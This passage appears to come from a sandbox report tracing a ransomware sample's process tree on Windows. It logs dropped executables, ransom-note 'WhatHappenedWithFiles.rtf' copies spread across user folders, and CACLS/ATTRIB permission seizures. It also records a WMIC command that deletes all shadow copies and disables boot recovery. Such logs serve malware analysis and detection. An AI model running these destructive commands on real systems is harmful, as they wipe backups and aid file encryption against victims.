        PID:2152
      - C:\Users\Admin\AppData\Roaming\MICROS~1\xr9qnma2.exe
        
        "C:\Users\Admin\AppData\Roaming\MICROS~1\xr9qnma2.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe" "C:\Users\Admin\AppData\Local\Microsoft\1GNLT2Tg.exe" 1
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:772
        
        C:\Users\Admin\AppData\Roaming\MICROS~1\xr9qnma2.exe
        
        "C:\Users\Admin\AppData\Roaming\MICROS~1\xr9qnma2.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe" "C:\Users\Admin\AppData\Local\Microsoft\1GNLT2Tg.exe" 1
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        
        PID:2256
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\MICROS~1\1GNLT2Tg.exe" && "C:\Users\Admin\AppData\Local\MICROS~1\1GNLT2Tg.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\xr9qnma2.exe" 2
        5⤵
        Loads dropped DLL
        
        PID:592
      - C:\Users\Admin\AppData\Local\MICROS~1\1GNLT2Tg.exe
        
        "C:\Users\Admin\AppData\Local\MICROS~1\1GNLT2Tg.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\xr9qnma2.exe" 2
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:2772
        
        C:\Users\Admin\AppData\Local\MICROS~1\1GNLT2Tg.exe
        
        "C:\Users\Admin\AppData\Local\MICROS~1\1GNLT2Tg.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\xr9qnma2.exe" 2
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        
        PID:2584
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\1YbAnN3f.exe" && "C:\Users\Admin\AppData\Local\Temp\1YbAnN3f.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "BRO_STARTED" "60000"
        5⤵
        Loads dropped DLL
        
        PID:940
      - C:\Users\Admin\AppData\Local\Temp\1YbAnN3f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1YbAnN3f.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "BRO_STARTED" "60000"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:840
        
        C:\Users\Admin\AppData\Local\Temp\1YbAnN3f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1YbAnN3f.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "BRO_STARTED" "60000"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:2636
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\RZQHvJ7k.exe" && "C:\Users\Admin\AppData\Local\Temp\RZQHvJ7k.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "LOCAL_67B38C0E52010C27" "60000"
        5⤵
        Loads dropped DLL
        
        PID:2268
      - C:\Users\Admin\AppData\Local\Temp\RZQHvJ7k.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RZQHvJ7k.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "LOCAL_67B38C0E52010C27" "60000"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:1164
        
        C:\Users\Admin\AppData\Local\Temp\RZQHvJ7k.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RZQHvJ7k.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "LOCAL_67B38C0E52010C27" "60000"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:1928
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\J7mkP1S9.cmd"
        8⤵
        
        PID:2624
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:2432
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\MvC1pbCt.exe" && "C:\Users\Admin\AppData\Local\Temp\MvC1pbCt.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "WIN_6.1_64|ADMIN_YES|INT_4" "60000"
        5⤵
        Loads dropped DLL
        
        PID:2712
      - C:\Users\Admin\AppData\Local\Temp\MvC1pbCt.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MvC1pbCt.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "WIN_6.1_64|ADMIN_YES|INT_4" "60000"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:2240
        
        C:\Users\Admin\AppData\Local\Temp\MvC1pbCt.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MvC1pbCt.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "WIN_6.1_64|ADMIN_YES|INT_4" "60000"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:1144
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\JM2rTPHa.cmd"
        8⤵
        
        PID:976
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:2428
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\yoxm3vFb.exe" && "C:\Users\Admin\AppData\Local\Temp\yoxm3vFb.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "276_LESS_1GB" "60000"
        5⤵
        Loads dropped DLL
        
        PID:1856
      - C:\Users\Admin\AppData\Local\Temp\yoxm3vFb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\yoxm3vFb.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "276_LESS_1GB" "60000"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:396
        
        C:\Users\Admin\AppData\Local\Temp\yoxm3vFb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\yoxm3vFb.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "276_LESS_1GB" "60000"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:2988
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\k6zWXYwZ.cmd"
        8⤵
        
        PID:584
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:1320
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\o0fogtco.exe" && "C:\Users\Admin\AppData\Local\Temp\o0fogtco.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "FILESEXTLIST" "60000" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\N00fBwZXjOQTTX9M.elst" "1"
        5⤵
        Loads dropped DLL
        
        PID:2312
      - C:\Users\Admin\AppData\Local\Temp\o0fogtco.exe
        
        "C:\Users\Admin\AppData\Local\Temp\o0fogtco.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "FILESEXTLIST" "60000" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\N00fBwZXjOQTTX9M.elst" "1"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\o0fogtco.exe
        
        "C:\Users\Admin\AppData\Local\Temp\o0fogtco.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "FILESEXTLIST" "60000" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\N00fBwZXjOQTTX9M.elst" "1"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:2516
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\th0QjboI.cmd"
        8⤵
        
        PID:1360
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 6 localhost
        9⤵
        Runs ping.exe
        
        PID:1160
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic.exe process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2308
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:1248
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C vssadmin.exe delete shadows /all /quiet
        9⤵
        
        PID:2500
        
        C:\Windows\SysWOW64\vssadmin.exe
        
        vssadmin.exe delete shadows /all /quiet
        10⤵
        Interacts with shadow copies
        
        PID:2808
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:556
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\lbeBHbdx.cmd"
        8⤵
        
        PID:2444
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:2904
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\f62i2ygu.exe" && "C:\Users\Admin\AppData\Local\Temp\f62i2ygu.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "CIP_STARTED" "60000"
        5⤵
        Loads dropped DLL
        
        PID:1372
      - C:\Users\Admin\AppData\Local\Temp\f62i2ygu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\f62i2ygu.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "CIP_STARTED" "60000"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:2728
        
        C:\Users\Admin\AppData\Local\Temp\f62i2ygu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\f62i2ygu.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "CIP_STARTED" "60000"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:2036
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\clqQr3QD.cmd"
        8⤵
        
        PID:1904
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:2700
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Music\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:832
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOCUME~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1544
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOWNLO~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1068
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOCUME~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2872
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Music\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:988
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOCUME~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:876
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Music\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2264
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Pictures\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1764
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOCUME~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1700
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOWNLO~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1664
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2880
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Contacts\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1600
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2556
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOCUME~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2200
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOWNLO~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2324
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\FAVORI~1\Links\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1320
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\FAVORI~1\LINKSF~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2852
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\FAVORI~1\MICROS~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2756
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\FAVORI~1\MSNWEB~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2112
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\iRHgv8BP.exe" && "C:\Users\Admin\AppData\Local\Temp\iRHgv8BP.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "100_OK" "60000"
        5⤵
        Loads dropped DLL
        
        PID:2580
      - C:\Users\Admin\AppData\Local\Temp\iRHgv8BP.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iRHgv8BP.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "100_OK" "60000"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:2028
        
        C:\Users\Admin\AppData\Local\Temp\iRHgv8BP.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iRHgv8BP.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "100_OK" "60000"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:2908
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\Dy4bvWbn.cmd"
        8⤵
        
        PID:876
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:1484
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Music\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1524
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Pictures\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:3016
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\Admin\Searches\Everywhere.search-ms" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\Admin\Searches\Everywhere.search-ms"
        5⤵
        
        PID:1380
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\Admin\Searches\Everywhere.search-ms" /E /G Admin:F /C
        6⤵
        
        PID:2200
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\Admin\Searches\Everywhere.search-ms"
        6⤵
        Views/modifies file attributes
        
        PID:1956
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Searches\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1864
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\Admin\Searches\Indexed Locations.search-ms" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\Admin\Searches\Indexed Locations.search-ms"
        5⤵
        
        PID:2344
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\Admin\Searches\Indexed Locations.search-ms" /E /G Admin:F /C
        6⤵
        
        PID:1292
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\Admin\Searches\Indexed Locations.search-ms"
        6⤵
        Views/modifies file attributes
        
        PID:848
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
        5⤵
        
        PID:1944
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C
        6⤵
        
        PID:2240
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
        6⤵
        Views/modifies file attributes
        
        PID:2896
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\Adobe\Acrobat\9.0\REPLIC~1\Security\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1748
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
        5⤵
        
        PID:2756
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
        6⤵
        
        PID:832
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
        6⤵
        Views/modifies file attributes
        
        PID:920
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\DEVICE~1\Device\{11352~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1868
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
        5⤵
        
        PID:1712
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
        6⤵
        
        PID:2692
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
        6⤵
        Views/modifies file attributes
        
        PID:2684
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
        5⤵
        
        PID:3012
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
        6⤵
        
        PID:1536
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
        6⤵
        Views/modifies file attributes
        
        PID:948
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
        5⤵
        
        PID:2320
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
        6⤵
        
        PID:1672
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
        6⤵
        Views/modifies file attributes
        
        PID:2776
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
        5⤵
        
        PID:1740
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
        6⤵
        
        PID:2352
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
        6⤵
        Views/modifies file attributes
        
        PID:2500
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\DEVICE~1\Device\{8702D~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2632
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
        5⤵
        
        PID:2484
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
        6⤵
        
        PID:2492
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
        6⤵
        Views/modifies file attributes
        
        PID:2136
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\MF\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1148
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\OFFICE\UICAPT~1\1036\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2612
    - - C:\Windows\SysWOW64\cmd.exe
        
